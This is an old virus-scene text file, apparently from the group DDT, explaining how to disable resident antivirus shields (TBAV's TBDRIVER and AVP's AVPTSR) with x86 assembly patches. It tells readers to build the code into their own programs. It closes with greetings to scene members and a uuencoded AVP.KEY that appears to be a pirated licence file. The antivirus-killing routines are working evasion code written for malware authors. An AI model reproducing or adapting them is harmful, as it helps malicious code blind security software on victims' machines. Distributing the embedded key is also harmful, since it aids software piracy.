ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ How to disable some residents shields ³ Mandragore/DDT ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ HOW TO disable some residents shields ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ===> TBAV - fairly easy, based on the eb 0 method: we've just to disable TBDRIVER, since all modules work through it... you need to get the tbdriver segment.. here'z a way to get it: mov ax,1605h ; test if system ready for winblows launching mov dx,1 ; some magic values xor cx,cx ; " " int 2fh ; 'multiplexor funcs' ÀÄ es = seg now you've just to patch the argument of a jmp (0xeb) at seg:290h mov byte ptr es:[291h],0 they're just disabled, and their residency check work yet! the only pb iz that the priors false-warnings are suppressed :( ===> AVPTSR - not so known but well working. from AVP toolkit. it hooks the int 22h for his work, so there'z a fixed value in the PSP at offset +10 for int 22h : 3F5Ch . It's the offset of the AVPTSR int 22h hooker. what we need here is to get the segment, once again.. mov si,3f5ch cmp wptr ds:[0ah],si jne no_avptsr mov ds,ds:[0ch] okay.. now let's look at the option byte (seg:23ADh) : byte 7 'Registers' ??? byte 6 'Check all files' self xplain byte 5 'Scan on exec' self xplain byte 4 'Dangerous call' used for int 2fh byte 3 'Write to sector' self xplain byte 2 'Format sector' let this flag quiet ;) byte 1 'Memory check' check below... byte 0 'Access to file' int 21 sf 3d/40/43/57/... here'z the simple way to alter it: and word ptr ds:[23adh],0feh ; disable 'access to file' only mem check: there's a small problem... the flag is tested before the execution, so we have to disable (for example) the int 22h handler : mov byte ptr ds:[si],0cfh ; put an iret the pb: if something else hook int 22h after avptsr, you can't guess it's there, and their 'already rsdnt check' is to disp an AV string :( Now it's your work to include it nicely in your own code, and use it while it works... This txt wuz a pretext to put my perso greetz ;) URG0 keep thoses maths away from me, but bring me some ED beers :) Mi$t keep workin! but beware of the urgo32 scepticism :P T-2000 i didn't forget you diz time :) go back on IRC sometimes Darkman after 12 years old, girlies aren't out of date! Reptile 0ne day i'll smoke ya |)~ Yesna hold reptile a moment plz.... Buzz prepare to run Virus-ex nothing xcept >/dev/null Owl keep da good work! all girlz who come sometimes on #vir, lemme hypnotise ya ;) and of course, respects to all DDT mmbrz!! Ä--ù mAndRagírä - bonus :) i know that some of you don't already get it ! begin 644 AVP.KEY M0590(#,N,"!+97D@1FEL90````````````````````!!1"XX`P!,?1(0ZP`` M`&[.PR:>OGY1LJ4N$4XR+=\B3;VL`' M"`D*"PP-#@\P7%-=4$?)R%E>54E9'1\?8&%B8V1E9F=7MTIX?7YZ=ZQB9U,& M,#&4FS`I+XLX.G\6FQ%LE`P)"6@DJ;L<`@)LCA@&$KC#`1@*$EJ$?S\\+*#( M[."JA=7P8(6E./[A:NNJG)A';(EJ:7G<]_KU\;Y@7)N"RLK#V:_'Z8G."? M*ZV?(#FG@YL]'?WZ%^GJ#0H-"@T*6U)E9VES=')A=&EO;ET-"E)E9VES=&5R M960]665S#0I.86UE/6UA;F1R86=O4EN9F]%=F5R M>4QA=6YC:#U.;PT*17AP:7)$871E/3`P+S`P+S(P,#`-"D%L87)M1&%Y2X@56YA=71H;W)I>F5D(&1U M<&QI8V%T:6]N('!R;VAI8FET960N($%L;"!R:6=H=',-"G)E7)I9VAT(#$Y.3$M.371E($(N5BP@5&AE($YE M=&AE8%NBF-/:+%]@9W1H*)]LG MW"?A)^(GWR?@)]4GUB?3)]0GV2?:)]-)XXGBR>,)Y$G4M4_Y43T0?8S MHDWK2.Y-]D_Q!+Q,U3OP/NY+HCSU_O-"[?SZ.O#Z]3KX/^[WY4#Q2:([ZO/T M<>]IY6;K,.<.B7+-$?MOHE;C!.=LHFSK6NLEB5SG;/)=]"+F$Z),HFSP8.=M 1ZV#V5?0:YOB(]X'V@?6!848` ` end